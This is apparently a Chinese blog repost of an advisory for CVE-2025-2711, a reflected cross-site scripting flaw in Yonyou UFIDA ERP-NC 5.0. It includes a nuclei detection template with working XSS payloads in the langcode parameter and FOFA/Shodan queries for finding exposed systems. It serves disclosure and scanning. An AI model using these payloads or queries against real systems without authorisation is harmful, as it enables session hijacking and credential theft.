Yonyou UFIDA ERP-NC V50 跨站可执行脚本漏洞

漏洞信息

漏洞名称: Yonyou UFIDA ERP-NC V5.0 跨站可执行脚本漏洞

漏洞编号:

  • CVE: CVE-2025-2711

漏洞类型: 跨站可执行脚本

漏洞等级: 中危

漏洞描述: 用友UFIDA ERP-NC V5.0是一款广泛使用的企业资源规划(ERP)系统,旨在帮助企业整合和管理其业务流程。该系统在企业中部署广泛,特别是在需要复杂业务流程管理的组织中。该漏洞存在于系统的帮助文件中,具体为/help/systop.jsp和/help/top.jsp页面,由于对langcode参数的用户输入未进行适当的清理和验证,导致反射型跨站脚本(XSS)漏洞。攻击者可以通过构造特定的URL,诱使受害者点击,从而在受害者的浏览器中执行任意JavaScript代码。这种漏洞的利用可能导致会话劫持、凭证盗窃或其他恶意活动,严重影响企业数据安全和业务流程的完整性。由于攻击者需要诱骗用户点击恶意链接,因此该漏洞的利用需要一定的用户交互,但其潜在影响仍然不容忽视。

产品厂商: yonyou

产品名称: ufida_erp-nc

影响版本: 5.0

搜索语法: icon_hash=”1085941792”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/cd3f0bbe89645227d2719a307ce0e0963bb16597/http%2Fcves%2F2025%2FCVE-2025-2711.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56

id: CVE-2025-2711

info:
  name: Yonyou UFIDA ERP-NC V5.0 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Yonyou UFIDA ERP-NC V5.0 is vulnerable to reflected cross-site scripting (XSS) via the langcode parameter in /help/systop.jsp and /help/top.jsp. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.
  impact: |
    Successful exploitation of this XSS vulnerability allows attackers to execute arbitrary JavaScript code in victims' browsers, potentially leading to session hijacking, credential theft, or other malicious activities in the ERP system.
  remediation: |
    Update Yonyou UFIDA ERP-NC to the latest version. Implement proper input validation and output encoding for all user-supplied data, especially the langcode parameter in help JSP files.
  reference:
    - https://github.com/Hebing123/cve/issues/86
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2711
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-2711
    cwe-id: CWE-79
    cpe: cpe:2.3:a:yonyou:ufida_erp-nc:5.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: yonyou
    product: ufida_erp-nc
    fofa-query: icon_hash="1085941792"
    shodan-query: title:"用友"
  tags: cve,cve2025,xss,erp-nc,ufida,yonyou

http:
  - method: GET
    path:
      - "{{BaseURL}}/help/systop.jsp?langcode=1%22%3E%3Csvg%20onload=alert(document.domain)%3E"
      - "{{BaseURL}}/help/systop.jsp?langcode=1%22%3E%3C/script%3E%3Csvg%20onload=alert(document.domain)%3E"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<svg onload=alert(document.domain)>.png)'
          - 'Search.jsp'
        condition: and

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 200

Github Poc
#projectdiscovery/nuclei-templates:github issues #跨站可执行脚本
Yonyou UFIDA ERP-NC V50 跨站可执行脚本漏洞
http://example.com/2025/07/17/github_163642272/
作者
lianccc
发布于
2025年7月17日
许可协议